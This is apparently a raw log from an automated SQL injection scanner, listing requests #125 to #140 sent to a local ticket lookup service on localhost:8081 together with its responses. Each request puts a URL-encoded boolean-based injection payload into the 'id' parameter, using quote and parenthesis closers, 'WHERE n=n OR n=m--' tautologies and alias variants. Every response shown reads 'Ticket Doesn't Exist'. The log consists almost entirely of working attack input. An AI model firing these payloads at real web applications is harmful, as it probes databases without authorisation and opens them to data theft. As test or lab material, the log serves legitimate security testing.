Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:54 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-8785%27%29%20WHERE%208324%3D8324%20OR%208771%3D8771--%20cVAu

Ticket Doesn't Exist

############################################################################

HTTP request [#125]:
GET /?id=-6015%22%29%20WHERE%209853%3D9853%20OR%209224%3D1138--%20uxiT HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#125] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:54 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-6015%22%29%20WHERE%209853%3D9853%20OR%209224%3D1138--%20uxiT

Ticket Doesn't Exist

############################################################################

HTTP request [#126]:
GET /?id=-3883%22%29%20WHERE%203510%3D3510%20OR%208771%3D8771--%20ugmh HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#126] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:54 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-3883%22%29%20WHERE%203510%3D3510%20OR%208771%3D8771--%20ugmh

Ticket Doesn't Exist

############################################################################

HTTP request [#127]:
GET /?id=-2785%27%20WHERE%203992%3D3992%20OR%202181%3D2556--%20pOoG HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#127] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:54 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-2785%27%20WHERE%203992%3D3992%20OR%202181%3D2556--%20pOoG

Ticket Doesn't Exist

############################################################################

HTTP request [#128]:
GET /?id=-9273%27%20WHERE%208845%3D8845%20OR%208771%3D8771--%20ashB HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#128] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:54 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-9273%27%20WHERE%208845%3D8845%20OR%208771%3D8771--%20ashB

Ticket Doesn't Exist

############################################################################

HTTP request [#129]:
GET /?id=-5529%22%20WHERE%201210%3D1210%20OR%201616%3D4124--%20XWUJ HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#129] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:54 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-5529%22%20WHERE%201210%3D1210%20OR%201616%3D4124--%20XWUJ

Ticket Doesn't Exist

############################################################################

HTTP request [#130]:
GET /?id=-3287%22%20WHERE%206115%3D6115%20OR%208771%3D8771--%20XMFc HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#130] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:54 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-3287%22%20WHERE%206115%3D6115%20OR%208771%3D8771--%20XMFc

Ticket Doesn't Exist

############################################################################

HTTP request [#131]:
GET /?id=-3659%27%29%29%20AS%20zYLh%20WHERE%207223%3D7223%20OR%203409%3D9727--%20IqXl HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#131] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:54 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-3659%27%29%29%20AS%20zYLh%20WHERE%207223%3D7223%20OR%203409%3D9727--%20IqXl

Ticket Doesn't Exist

############################################################################

HTTP request [#132]:
GET /?id=-5036%27%29%29%20AS%20SCim%20WHERE%207246%3D7246%20OR%208771%3D8771--%20UeSw HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#132] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:54 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-5036%27%29%29%20AS%20SCim%20WHERE%207246%3D7246%20OR%208771%3D8771--%20UeSw

Ticket Doesn't Exist

############################################################################

HTTP request [#133]:
GET /?id=-2272%22%29%29%20AS%20SDVb%20WHERE%208284%3D8284%20OR%206743%3D7369--%20gXmf HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#133] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:54 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-2272%22%29%29%20AS%20SDVb%20WHERE%208284%3D8284%20OR%206743%3D7369--%20gXmf

Ticket Doesn't Exist

############################################################################

HTTP request [#134]:
GET /?id=-3006%22%29%29%20AS%20iAMF%20WHERE%205564%3D5564%20OR%208771%3D8771--%20YQCt HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#134] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:54 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-3006%22%29%29%20AS%20iAMF%20WHERE%205564%3D5564%20OR%208771%3D8771--%20YQCt

Ticket Doesn't Exist

############################################################################

HTTP request [#135]:
GET /?id=-8069%27%29%20AS%20JwEc%20WHERE%208595%3D8595%20OR%206211%3D6833--%20vWTj HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#135] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:54 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-8069%27%29%20AS%20JwEc%20WHERE%208595%3D8595%20OR%206211%3D6833--%20vWTj

Ticket Doesn't Exist

############################################################################

HTTP request [#136]:
GET /?id=-5966%27%29%20AS%20JkUE%20WHERE%209446%3D9446%20OR%208771%3D8771--%20rTTV HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#136] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:54 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-5966%27%29%20AS%20JkUE%20WHERE%209446%3D9446%20OR%208771%3D8771--%20rTTV

Ticket Doesn't Exist

############################################################################

HTTP request [#137]:
GET /?id=-9538%22%29%20AS%20baeb%20WHERE%207453%3D7453%20OR%207907%3D5541--%20VzYY HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#137] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:55 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-9538%22%29%20AS%20baeb%20WHERE%207453%3D7453%20OR%207907%3D5541--%20VzYY

Ticket Doesn't Exist

############################################################################

HTTP request [#138]:
GET /?id=-7887%22%29%20AS%20pmoe%20WHERE%209718%3D9718%20OR%208771%3D8771--%20EDaE HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#138] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:55 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-7887%22%29%20AS%20pmoe%20WHERE%209718%3D9718%20OR%208771%3D8771--%20EDaE

Ticket Doesn't Exist

############################################################################

HTTP request [#139]:
GET /?id=78319%29%20OR%20NOT%202487%3D6818--%20iiRB HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#139] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:55 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%29%20OR%20NOT%202487%3D6818--%20iiRB

Ticket Doesn't Exist

############################################################################

HTTP request [#140]:
GET /?id=78319%29%20OR%20NOT%205289%3D2952%20AND%20%286035%3D6035 HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#140] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:55 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%29%20OR%20NOT%205289%3D2952%20AND%20%286035%3D6035

Ticket Doesn't Exist

############################################################################

